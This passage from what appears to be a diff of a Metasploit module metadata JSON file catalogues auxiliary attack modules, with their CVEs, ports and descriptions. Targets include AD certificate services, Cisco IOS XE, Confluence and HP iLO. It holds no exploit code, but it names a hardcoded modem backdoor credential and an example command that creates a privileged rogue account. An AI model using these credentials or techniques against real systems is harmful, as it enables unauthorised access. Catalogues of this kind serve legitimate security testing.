Depending on the certificate\n template's configuration the resulting certificate can be used for various operations such as authentication.\n PFX certificate files that are saved are encrypted with a blank password.\n\n This module is capable of exploiting ESC1, ESC2, ESC3, ESC13 and ESC15.", + "references": [ + "URL-https://github.com/GhostPack/Certify", + "URL-https://github.com/ly4k/Certipy" + ], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2025-03-21 10:30:20 +0000", + "path": "/modules/auxiliary/admin/dcerpc/icpr_cert.rb", + "is_install_path": true, + "ref_name": "admin/dcerpc/icpr_cert", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Reliability": [], + "Stability": [], + "SideEffects": [ + "ioc-in-logs" + ], + "AKA": [ + "Certifry", + "Certipy" + ] + }, + "session_types": [ + "smb" + ], + "needs_cleanup": false, + "actions": [ + { + "name": "REQUEST_CERT", + "description": "Request a certificate" + } + ] + }, + "auxiliary_admin/dcerpc/samr_account": { + "name": "SAMR Account Management", + "fullname": "auxiliary/admin/dcerpc/samr_account", + "aliases": [ + "auxiliary/admin/dcerpc/samr_computer" + ], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "JaGoTu", + "Spencer McIntyre", + "smashery" + ], + "description": "Add, lookup and delete user / machine accounts via MS-SAMR. By default\n standard active directory users can add up to 10 new computers to the\n domain (MachineAccountQuota). 
Administrative privileges however are required\n to delete the created accounts, or to create/delete user accounts.", + "references": [ + "URL-https://github.com/SecureAuthCorp/impacket/blob/master/examples/addcomputer.py" + ], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2024-12-16 14:55:10 +0000", + "path": "/modules/auxiliary/admin/dcerpc/samr_account.rb", + "is_install_path": true, + "ref_name": "admin/dcerpc/samr_account", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Reliability": [], + "Stability": [], + "SideEffects": [ + "ioc-in-logs" + ], + "AKA": [ + "samr_computer", + "samr_user" + ] + }, + "session_types": [ + "smb" + ], + "needs_cleanup": false, + "actions": [ + { + "name": "ADD_COMPUTER", + "description": "Add a computer account" + }, + { + "name": "ADD_USER", + "description": "Add a user account" + }, + { + "name": "DELETE_ACCOUNT", + "description": "Delete a computer or user account" + }, + { + "name": "LOOKUP_ACCOUNT", + "description": "Lookup a computer or user account" + } + ] + }, + "auxiliary_admin/dns/dyn_dns_update": { + "name": "DNS Server Dynamic Update Record Injection", + "fullname": "auxiliary/admin/dns/dyn_dns_update", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "King Sabri ", + "Brent Cook " + ], + "description": "This module allows adding and/or deleting a record to\n any remote DNS server that allows unrestricted dynamic updates.", + "references": [ + "URL-https://www.tenable.com/plugins/nessus/35372", + "URL-https://github.com/KINGSABRI/CVE-in-Ruby/tree/master/NONE-CVE/DNSInject", + "URL-https://www.christophertruncer.com/dns-modification-dnsinject-nessus-plugin-35372/", + "URL-https://github.com/ChrisTruncer/PenTestScripts/blob/master/HostScripts/DNSInject.py" + ], + "platform": "", + "arch": 
"", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/admin/dns/dyn_dns_update.rb", + "is_install_path": true, + "ref_name": "admin/dns/dyn_dns_update", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "ADD", + "description": "Add a new record. Fail if it already exists." + }, + { + "name": "DELETE", + "description": "Delete an existing record." + }, + { + "name": "UPDATE", + "description": "Add or update a record. (default)" + } + ] + }, + "auxiliary_admin/edirectory/edirectory_dhost_cookie": { + "name": "Novell eDirectory DHOST Predictable Session Cookie", + "fullname": "auxiliary/admin/edirectory/edirectory_dhost_cookie", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module is able to predict the next session cookie value issued\n by the DHOST web service of Novell eDirectory 8.8.5. 
An attacker can run\n this module, wait until the real administrator logs in, then specify the\n predicted cookie value to hijack their session.", + "references": [ + "CVE-2009-4655", + "OSVDB-60035" + ], + "platform": "", + "arch": "", + "rport": 8030, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2018-07-08 19:00:11 +0000", + "path": "/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb", + "is_install_path": true, + "ref_name": "admin/edirectory/edirectory_dhost_cookie", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/edirectory/edirectory_edirutil": { + "name": "Novell eDirectory eMBox Unauthenticated File Access", + "fullname": "auxiliary/admin/edirectory/edirectory_edirutil", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Nicob", + "MC ", + "sinn3r " + ], + "description": "This module will access Novell eDirectory's eMBox service and can run the\n following actions via the SOAP interface: GET_DN, READ_LOGS, LIST_SERVICES,\n STOP_SERVICE, START_SERVICE, SET_LOGFILE.", + "references": [ + "CVE-2008-0926", + "BID-28441", + "OSVDB-43690" + ], + "platform": "", + "arch": "", + "rport": 8028, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/admin/edirectory/edirectory_edirutil.rb", + "is_install_path": true, + "ref_name": "admin/edirectory/edirectory_edirutil", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "GET_DN", + "description": "Get DN" + }, + { + "name": "LIST_SERVICES", + "description": "List services" + }, + { + "name": 
"READ_LOGS", + "description": "Read all the log files" + }, + { + "name": "SET_LOGFILE", + "description": "Read Log File" + }, + { + "name": "START_SERVICE", + "description": "Start a service" + }, + { + "name": "STOP_SERVICE", + "description": "Stop a service" + } + ] + }, + "auxiliary_admin/emc/alphastor_devicemanager_exec": { + "name": "EMC AlphaStor Device Manager Arbitrary Command Execution", + "fullname": "auxiliary/admin/emc/alphastor_devicemanager_exec", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-05-27", + "type": "auxiliary", + "author": [ + "MC " + ], + "description": "EMC AlphaStor Device Manager is prone to a remote command-injection vulnerability\n because the application fails to properly sanitize user-supplied input.", + "references": [ + "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=703", + "OSVDB-45715", + "CVE-2008-2157", + "BID-29398" + ], + "platform": "", + "arch": "", + "rport": 3000, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb", + "is_install_path": true, + "ref_name": "admin/emc/alphastor_devicemanager_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/emc/alphastor_librarymanager_exec": { + "name": "EMC AlphaStor Library Manager Arbitrary Command Execution", + "fullname": "auxiliary/admin/emc/alphastor_librarymanager_exec", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-05-27", + "type": "auxiliary", + "author": [ + "MC " + ], + "description": "EMC AlphaStor Library Manager is prone to a remote command-injection vulnerability\n because the application fails to properly sanitize user-supplied input.", + "references": [ + "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=703", + 
"CVE-2008-2157", + "OSVDB-45715", + "BID-29398" + ], + "platform": "", + "arch": "", + "rport": 3500, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb", + "is_install_path": true, + "ref_name": "admin/emc/alphastor_librarymanager_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/firetv/firetv_youtube": { + "name": "Amazon Fire TV YouTube Remote Control", + "fullname": "auxiliary/admin/firetv/firetv_youtube", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "wvu " + ], + "description": "This module acts as a simple remote control for the Amazon Fire TV's\n YouTube app.\n\n Tested on the Amazon Fire TV Stick.", + "references": [ + "URL-http://http://web.archive.org/web/20210301101536/http://www.amazon.com/dp/B00CX5P8FC/?_encoding=UTF8", + "URL-https://www.amazon.com/dp/B00GDQ0RMG/ref=fs_ftvs" + ], + "platform": "", + "arch": "", + "rport": 8008, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2025-02-28 11:29:59 +0000", + "path": "/modules/auxiliary/admin/firetv/firetv_youtube.rb", + "is_install_path": true, + "ref_name": "admin/firetv/firetv_youtube", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "Play", + "description": "Play video" + }, + { + "name": "Stop", + "description": "Stop video" + } + ] + }, + "auxiliary_admin/hp/hp_data_protector_cmd": { + "name": "HP Data Protector 6.1 EXEC_CMD Command Execution", + "fullname": "auxiliary/admin/hp/hp_data_protector_cmd", + "aliases": [], + "rank": 
300, + "disclosure_date": "2011-02-07", + "type": "auxiliary", + "author": [ + "ch0ks", + "c4an", + "wireghoul", + "sinn3r " + ], + "description": "This module exploits HP Data Protector's omniinet process, specifically\n against a Windows setup.\n\n When an EXEC_CMD packet is sent, omniinet.exe will attempt to look\n for that user-supplied filename with kernel32!FindFirstFileW(). If the file\n is found, the process will then go ahead execute it with CreateProcess()\n under a new thread. If the filename isn't found, FindFirstFileW() will throw\n an error (0x03), and then bails early without triggering CreateProcess().\n\n Because of these behaviors, if you try to supply an argument, FindFirstFileW()\n will look at that as part of the filename, and then bail.\n\n Please note that when you specify the 'CMD' option, the base path begins\n under C:\\.", + "references": [ + "CVE-2011-0923", + "OSVDB-72526", + "ZDI-11-055", + "URL-https://hackarandas.com/blog/2011/08/04/hp-data-protector-remote-shell-for-hpux/" + ], + "platform": "", + "arch": "", + "rport": 5555, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/admin/hp/hp_data_protector_cmd.rb", + "is_install_path": true, + "ref_name": "admin/hp/hp_data_protector_cmd", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/hp/hp_ilo_create_admin_account": { + "name": "HP iLO 4 1.00-2.50 Authentication Bypass Administrator Account Creation", + "fullname": "auxiliary/admin/hp/hp_ilo_create_admin_account", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-08-24", + "type": "auxiliary", + "author": [ + "Fabien Perigaud " + ], + "description": "This module exploits an authentication bypass in HP iLO 4 1.00 to 2.50, triggered by a buffer\n overflow in the Connection HTTP header handling by the web 
server.\n Exploiting this vulnerability gives full access to the REST API, allowing arbitrary\n accounts creation.", + "references": [ + "CVE-2017-12542", + "BID-100467", + "URL-https://support.hpe.com/hpesc/public/docDisplay?docId=emr_na-hpesbhf03769en_us", + "URL-https://www.synacktiv.com/en/publications/hp-ilo-talk-at-recon-brx-2018.html" + ], + "platform": "", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/admin/hp/hp_ilo_create_admin_account.rb", + "is_install_path": true, + "ref_name": "admin/hp/hp_ilo_create_admin_account", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/hp/hp_imc_som_create_account": { + "name": "HP Intelligent Management SOM Account Creation", + "fullname": "auxiliary/admin/hp/hp_imc_som_create_account", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-10-08", + "type": "auxiliary", + "author": [ + "rgod ", + "juan vazquez " + ], + "description": "This module exploits a lack of authentication and access control in HP Intelligent\n Management, specifically in the AccountService RpcServiceServlet from the SOM component,\n in order to create a SOM account with Account Management permissions. 
This module has\n been tested successfully on HP Intelligent Management Center 5.2 E0401 and 5.1 E202 with\n SOM 5.2 E0401 and SOM 5.1 E0201 over Windows 2003 SP2.", + "references": [ + "CVE-2013-4824", + "OSVDB-98249", + "BID-62902", + "ZDI-13-240", + "URL-https://support.hpe.com/hpesc/public/docDisplay?docId=emr_na-c03943547" + ], + "platform": "", + "arch": "", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/admin/hp/hp_imc_som_create_account.rb", + "is_install_path": true, + "ref_name": "admin/hp/hp_imc_som_create_account", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/allegro_rompager_auth_bypass": { + "name": "Allegro Software RomPager 'Misfortune Cookie' (CVE-2014-9222) Authentication Bypass", + "fullname": "auxiliary/admin/http/allegro_rompager_auth_bypass", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-12-17", + "type": "auxiliary", + "author": [ + "Jon Hart ", + "Jan Trencansky ", + "Lior Oppenheim" + ], + "description": "This module exploits HTTP servers that appear to be vulnerable to the\n 'Misfortune Cookie' vulnerability which affects Allegro Software\n Rompager versions before 4.34 and can allow attackers to authenticate\n to the HTTP service as an administrator without providing valid\n credentials.", + "references": [ + "CVE-2014-9222", + "URL-https://web.archive.org/web/20191006135858/http://mis.fortunecook.ie/", + "URL-https://web.archive.org/web/20190207102911/http://mis.fortunecook.ie/misfortune-cookie-suspected-vulnerable.pdf", + "URL-https://web.archive.org/web/20190623150837/http://mis.fortunecook.ie/too-many-cooks-exploiting-tr069_tal-oppenheim_31c3.pdf" + ], + "platform": "", + "arch": 
"", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/allegro_rompager_auth_bypass.rb", + "is_install_path": true, + "ref_name": "admin/http/allegro_rompager_auth_bypass", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/arris_motorola_surfboard_backdoor_xss": { + "name": "Arris / Motorola Surfboard SBG6580 Web Interface Takeover", + "fullname": "auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-04-08", + "type": "auxiliary", + "author": [ + "joev " + ], + "description": "The web interface for the Arris / Motorola Surfboard SBG6580 has\n several vulnerabilities that, when combined, allow an arbitrary website to take\n control of the modem, even if the user is not currently logged in. The attacker\n must successfully know, or guess, the target's internal gateway IP address.\n This is usually a default value of 192.168.0.1.\n\n First, a hardcoded backdoor account was discovered in the source code\n of one device with the credentials \"technician/yZgO8Bvj\". Due to lack of CSRF\n in the device's login form, these credentials - along with the default\n \"admin/motorola\" - can be sent to the device by an arbitrary website, thus\n inadvertently logging the user into the router.\n\n Once successfully logged in, a persistent XSS vulnerability is\n exploited in the firewall configuration page. 
This allows injection of\n Javascript that can perform any available action in the router interface.\n\n The following firmware versions have been tested as vulnerable:\n\n SBG6580-6.5.2.0-GA-06-077-NOSH, and\n SBG6580-8.6.1.0-GA-04-098-NOSH", + "references": [ + "CVE-2015-0964", + "CVE-2015-0965", + "CVE-2015-0966", + "URL-http://web.archive.org/web/20220810083803/https://www.rapid7.com/blog/post/2015/06/05/r7-2015-01-csrf-backdoor-and-persistent-xss-on-arris-motorola-cable-modems/" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss.rb", + "is_install_path": true, + "ref_name": "admin/http/arris_motorola_surfboard_backdoor_xss", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "WebServer", + "description": "Serve exploit via web server" + } + ] + }, + "auxiliary_admin/http/atlassian_confluence_auth_bypass": { + "name": "Atlassian Confluence Data Center and Server Authentication Bypass via Broken Access Control", + "fullname": "auxiliary/admin/http/atlassian_confluence_auth_bypass", + "aliases": [], + "rank": 300, + "disclosure_date": "2023-10-04", + "type": "auxiliary", + "author": [ + "Unknown", + "Emir Polat" + ], + "description": "This module exploits a broken access control vulnerability in Atlassian Confluence servers leading to an authentication bypass.\n A specially crafted request can be create new admin account without authentication on the target Atlassian server.", + "references": [ + "CVE-2023-22515", + "URL-https://confluence.atlassian.com/security/cve-2023-22515-privilege-escalation-vulnerability-in-confluence-data-center-and-server-1295682276.html", + "URL-https://nvd.nist.gov/vuln/detail/CVE-2023-22515", + 
"URL-https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis" + ], + "platform": "", + "arch": "", + "rport": 8090, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-10-19 17:11:03 +0000", + "path": "/modules/auxiliary/admin/http/atlassian_confluence_auth_bypass.rb", + "is_install_path": true, + "ref_name": "admin/http/atlassian_confluence_auth_bypass", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "config-changes" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/axigen_file_access": { + "name": "Axigen Arbitrary File Read and Delete", + "fullname": "auxiliary/admin/http/axigen_file_access", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-10-31", + "type": "auxiliary", + "author": [ + "Zhao Liang", + "juan vazquez " + ], + "description": "This module exploits a directory traversal vulnerability in the WebAdmin\n interface of Axigen, which allows an authenticated user to read and delete\n arbitrary files with SYSTEM privileges. The vulnerability is known to work on\n Windows platforms. 
This module has been tested successfully on Axigen 8.10 over\n Windows 2003 SP2.", + "references": [ + "US-CERT-VU-586556", + "CVE-2012-4940", + "OSVDB-86802" + ], + "platform": "", + "arch": "", + "rport": 9000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/axigen_file_access.rb", + "is_install_path": true, + "ref_name": "admin/http/axigen_file_access", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "Delete", + "description": "Delete remote file" + }, + { + "name": "Read", + "description": "Read remote file" + } + ] + }, + "auxiliary_admin/http/cfme_manageiq_evm_pass_reset": { + "name": "Red Hat CloudForms Management Engine 5.1 miq_policy/explorer SQL Injection", + "fullname": "auxiliary/admin/http/cfme_manageiq_evm_pass_reset", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-11-12", + "type": "auxiliary", + "author": [ + "Ramon de C Valle " + ], + "description": "This module exploits a SQL injection vulnerability in the \"explorer\"\n action of \"miq_policy\" controller of the Red Hat CloudForms Management\n Engine 5.1 (ManageIQ Enterprise Virtualization Manager 5.0 and earlier) by\n changing the password of the target account to the specified password.", + "references": [ + "CVE-2013-2050", + "CWE-89", + "URL-https://bugzilla.redhat.com/show_bug.cgi?id=959062" + ], + "platform": "", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb", + "is_install_path": true, + "ref_name": 
"admin/http/cfme_manageiq_evm_pass_reset", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/cisco_7937g_ssh_privesc": { + "name": "Cisco 7937G SSH Privilege Escalation", + "fullname": "auxiliary/admin/http/cisco_7937g_ssh_privesc", + "aliases": [], + "rank": 300, + "disclosure_date": "2020-06-02", + "type": "auxiliary", + "author": [ + "Cody Martin" + ], + "description": "This module exploits a feature that should not be available \n\tvia the web interface. An unauthenticated user may change \n\tthe credentials for SSH access to any username and password \n\tcombination desired, giving access to administrative \n\tfunctions through an SSH connection.", + "references": [ + "URL-https://web.archive.org/web/20200921054955/https://www.blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/", + "CVE-2020-16137" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/admin/http/cisco_7937g_ssh_privesc.py", + "is_install_path": true, + "ref_name": "admin/http/cisco_7937g_ssh_privesc", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/cisco_ios_xe_cli_exec_cve_2023_20198": { + "name": "Cisco IOX XE unauthenticated Command Line Interface (CLI) execution", + "fullname": "auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198", + "aliases": [], + "rank": 300, + "disclosure_date": "2023-10-16", + "type": "auxiliary", + "author": [ + "sfewer-r7" + ], + "description": "This module leverages CVE-2023-20198 against vulnerable instances of Cisco IOS XE devices which have the\n Web UI exposed. 
An attacker can execute arbitrary CLI commands with privilege level 15.\n\n You must specify the IOS command mode to execute a CLI command in. Valid modes are `user`, `privileged`, and\n `global`. To run a command in \"Privileged\" mode, set the `CMD` option to the command you want to run,\n e.g. `show version` and set the `MODE` to `privileged`. To run a command in \"Global Configuration\" mode, set\n the `CMD` option to the command you want to run, e.g. `username hax0r privilege 15 password hax0r` and set\n the `MODE` to `global`.\n\n The vulnerable IOS XE versions are:\n 16.1.1, 16.1.2, 16.1.3, 16.2.1, 16.2.2, 16.3.1, 16.3.2, 16.3.3, 16.3.1a, 16.3.4,\n 16.3.5, 16.3.5b, 16.3.6, 16.3.7, 16.3.8, 16.3.9, 16.3.10, 16.3.11, 16.4.1, 16.4.2,\n 16.4.3, 16.5.1, 16.5.1a, 16.5.1b, 16.5.2, 16.5.3, 16.6.1, 16.6.2, 16.6.3, 16.6.4,\n 16.6.5, 16.6.4s, 16.6.4a, 16.6.5a, 16.6.6, 16.6.5b, 16.6.7, 16.6.7a, 16.6.8, 16.6.9,\n 16.6.10, 16.7.1, 16.7.1a, 16.7.1b, 16.7.2, 16.7.3, 16.7.4, 16.8.1, 16.8.1a, 16.8.1b,\n 16.8.1s, 16.8.1c, 16.8.1d, 16.8.2, 16.8.1e, 16.8.3, 16.9.1, 16.9.2, 16.9.1a, 16.9.1b,\n 16.9.1s, 16.9.1c, 16.9.1d, 16.9.3, 16.9.2a, 16.9.2s, 16.9.3h, 16.9.4, 16.9.3s, 16.9.3a,\n 16.9.4c, 16.9.5, 16.9.5f, 16.9.6, 16.9.7, 16.9.8, 16.9.8a, 16.9.8b, 16.9.8c, 16.10.1,\n 16.10.1a, 16.10.1b, 16.10.1s, 16.10.1c, 16.10.1e, 16.10.1d, 16.10.2, 16.10.1f, 16.10.1g,\n 16.10.3, 16.11.1, 16.11.1a, 16.11.1b, 16.11.2, 16.11.1s, 16.11.1c, 16.12.1, 16.12.1s,\n 16.12.1a, 16.12.1c, 16.12.1w, 16.12.2, 16.12.1y, 16.12.2a, 16.12.3, 16.12.8, 16.12.2s,\n 16.12.1x, 16.12.1t, 16.12.2t, 16.12.4, 16.12.3s, 16.12.1z, 16.12.3a, 16.12.4a, 16.12.5,\n 16.12.6, 16.12.1z1, 16.12.5a, 16.12.5b, 16.12.1z2, 16.12.6a, 16.12.7, 16.12.9, 16.12.10,\n 17.1.1, 17.1.1a, 17.1.1s, 17.1.2, 17.1.1t, 17.1.3, 17.2.1, 17.2.1r, 17.2.1a, 17.2.1v,\n 17.2.2, 17.2.3, 17.3.1, 17.3.2, 17.3.3, 17.3.1a, 17.3.1w, 17.3.2a, 17.3.1x, 17.3.1z,\n 17.3.3a, 17.3.4, 17.3.5, 17.3.4a, 17.3.6, 17.3.4b, 17.3.4c, 17.3.5a, 17.3.5b, 17.3.7,\n 17.3.8, 
17.4.1, 17.4.2, 17.4.1a, 17.4.1b, 17.4.1c, 17.4.2a, 17.5.1, 17.5.1a, 17.5.1b,\n 17.5.1c, 17.6.1, 17.6.2, 17.6.1w, 17.6.1a, 17.6.1x, 17.6.3, 17.6.1y, 17.6.1z, 17.6.3a,\n 17.6.4, 17.6.1z1, 17.6.5, 17.6.6, 17.7.1, 17.7.1a, 17.7.1b, 17.7.2, 17.10.1, 17.10.1a,\n 17.10.1b, 17.8.1, 17.8.1a, 17.9.1, 17.9.1w, 17.9.2, 17.9.1a, 17.9.1x, 17.9.1y, 17.9.3,\n 17.9.2a, 17.9.1x1, 17.9.3a, 17.9.4, 17.9.1y1, 17.11.1, 17.11.1a, 17.12.1, 17.12.1a,\n 17.11.99SW", + "references": [ + "CVE-2023-20198", + "URL-https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z", + "URL-http://web.archive.org/web/20250214093736/https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/", + "URL-https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z/cvrf/cisco-sa-iosxe-webui-privesc-j22SaA4z_cvrf.xml", + "URL-https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/", + "URL-https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/" + ], + "platform": "", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198.rb", + "is_install_path": true, + "ref_name": "admin/http/cisco_ios_xe_cli_exec_cve_2023_20198", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/cisco_ios_xe_os_exec_cve_2023_20273": { + "name": "Cisco IOX XE unauthenticated OS command execution", + "fullname": "auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273", + "aliases": [], + 
"rank": 300, + "disclosure_date": "2023-10-16", + "type": "auxiliary", + "author": [ + "sfewer-r7" + ], + "description": "This module leverages both CVE-2023-20198 and CVE-2023-20273 against vulnerable instances of Cisco IOS XE\n devices which have the Web UI exposed. An attacker can execute arbitrary OS commands with root privileges.\n\n This module leverages CVE-2023-20198 to create a new admin user, then authenticating as this user,\n CVE-2023-20273 is leveraged for OS command injection. The output of the command is written to a file and read\n back via the webserver. Finally the output file is deleted and the admin user is removed.\n\n The vulnerable IOS XE versions are:\n 16.1.1, 16.1.2, 16.1.3, 16.2.1, 16.2.2, 16.3.1, 16.3.2, 16.3.3, 16.3.1a, 16.3.4,\n 16.3.5, 16.3.5b, 16.3.6, 16.3.7, 16.3.8, 16.3.9, 16.3.10, 16.3.11, 16.4.1, 16.4.2,\n 16.4.3, 16.5.1, 16.5.1a, 16.5.1b, 16.5.2, 16.5.3, 16.6.1, 16.6.2, 16.6.3, 16.6.4,\n 16.6.5, 16.6.4s, 16.6.4a, 16.6.5a, 16.6.6, 16.6.5b, 16.6.7, 16.6.7a, 16.6.8, 16.6.9,\n 16.6.10, 16.7.1, 16.7.1a, 16.7.1b, 16.7.2, 16.7.3, 16.7.4, 16.8.1, 16.8.1a, 16.8.1b,\n 16.8.1s, 16.8.1c, 16.8.1d, 16.8.2, 16.8.1e, 16.8.3, 16.9.1, 16.9.2, 16.9.1a, 16.9.1b,\n 16.9.1s, 16.9.1c, 16.9.1d, 16.9.3, 16.9.2a, 16.9.2s, 16.9.3h, 16.9.4, 16.9.3s, 16.9.3a,\n 16.9.4c, 16.9.5, 16.9.5f, 16.9.6, 16.9.7, 16.9.8, 16.9.8a, 16.9.8b, 16.9.8c, 16.10.1,\n 16.10.1a, 16.10.1b, 16.10.1s, 16.10.1c, 16.10.1e, 16.10.1d, 16.10.2, 16.10.1f, 16.10.1g,\n 16.10.3, 16.11.1, 16.11.1a, 16.11.1b, 16.11.2, 16.11.1s, 16.11.1c, 16.12.1, 